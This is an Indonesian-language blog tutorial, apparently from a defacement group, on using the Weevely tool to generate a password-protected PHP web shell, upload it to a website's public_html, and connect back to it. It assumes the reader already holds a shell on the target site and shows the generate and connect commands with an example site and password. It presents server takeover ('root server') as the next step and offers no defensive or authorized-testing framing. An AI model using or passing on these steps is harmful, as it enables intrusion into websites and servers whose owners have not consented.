Backconnect Dengan Weevely

Siang Makhluk Idup...
balik lagi sama gw Crusher. dikesempatan ini gw mau sharing, tutorial Backconnect dengan Weevely

nah step by step nya ikutin aja :v

1. Akses Shell yang udah tertanam (wajib)
2. Install python, blom tau caranya? hampir sama Dengan ini
3. Download dulu Filenya, Nih !

pass : https://destroy-squad.ga 







itu tampilan awal yaa.. gw Run di CMD :v



Buat Command nya ini :

namatools.py -g -o namashell.php -p passwordshell 
----------------------------------------------------------------
namatools.py -t -u link shellyang udah di upload -p passwordshell


=> nama tools => back.py
=> nama shell => terserah mau namain apa
=> password shell => isi pake password kalian (terserah)
=> link shellyang udah di upload => isi pake situs beserta shell tadi

kalo udah generate shell, tinggal upload ke web masing2, Recommended di public_html aja, biar ga ribet ya coi ^-^



Contoh nih,  baca ya tod


=> back.py -g -o destroy.php -p 1945=> back.py -t -u https://website.com/destroy.php -p 1945









tuh udah Connect :v, terserah mau ngapain, root server dll.
kalo masih bingung, Nih gw kasih Videonya

Download + Pahami

Download Video


cukup, sekian Tq dah baca2 smoga bermanfaat
 See You ^-^

Berlangganan update artikel terbaru via email:

0 Response to "Backconnect Dengan Weevely"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel